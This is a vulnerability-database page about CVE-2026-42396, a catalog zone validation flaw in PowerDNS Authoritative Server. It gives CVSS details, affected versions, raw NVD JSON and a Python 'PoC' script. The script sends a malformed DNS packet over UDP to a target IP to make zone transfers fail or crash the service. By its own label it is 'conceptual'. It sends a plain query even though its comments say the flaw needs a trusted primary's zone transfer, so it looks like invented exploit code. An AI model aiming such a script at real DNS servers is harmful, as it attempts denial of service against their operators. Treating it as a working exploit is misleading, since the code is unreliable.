Security Vulnerability Report
中文
CVE-2026-42396 CVSS 4.9 MEDIUM

CVE-2026-42396

Published: 2026-05-21 10:16:26
Last Modified: 2026-05-21 15:27:52
Source: [email protected]

Description

Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

PowerDNS Authoritative Server 4.9.x < 4.9.4
PowerDNS Authoritative Server 4.8.x < 4.8.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # This is a conceptual PoC for CVE-2026-42396 # It demonstrates sending a malformed Catalog Zone payload to trigger the validation failure. # Note: Exploitation requires High Privileges (PR:H) as a trusted master. def send_malformed_catalog_zone(target_ip, target_port): try: # Construct a basic DNS packet header transaction_id = 0x1234 flags = 0x0100 # Standard query questions = 1 answer_rrs = 0 authority_rrs = 0 additional_rrs = 1 header = struct.pack("!HHHHHH", transaction_id, flags, questions, answer_rrs, authority_rrs, additional_rrs) # Question section (asking for the Catalog Zone) # Assuming the catalog zone is named 'catalog.example.com' question = b'\x07catalog\x07example\x03com\x00' question += struct.pack("!HH", 0x00FF, 0x0001) # TYPE: ANY (or specific Catalog type), CLASS: IN # Additional section: Malformed Member Zone Data # The vulnerability is triggered by invalid data in the member zone definition # Here we simulate a payload that might bypass validation or cause a crash malformed_member = b'\x05bad\x07member\x03com\x00' malformed_member += struct.pack("!HHIH", 0x00FF, 0x0001, 0x00000001, 0x0000) # Type, Class, TTL, DataLength # Injecting unexpected data to trigger the parsing failure malformed_payload = b'\x00' * 10 packet = header + question + malformed_member + malformed_payload sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(packet, (target_ip, target_port)) print(f"[+] Malformed Catalog Zone packet sent to {target_ip}:{target_port}") print("[+] Check if the zone transfer fails or service crashes.") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # Replace with actual target IP and Port target = "192.168.1.100" port = 53 send_malformed_catalog_zone(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42396", "sourceIdentifier": "[email protected]", "published": "2026-05-21T10:16:25.927", "lastModified": "2026-05-21T15:27:51.530", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.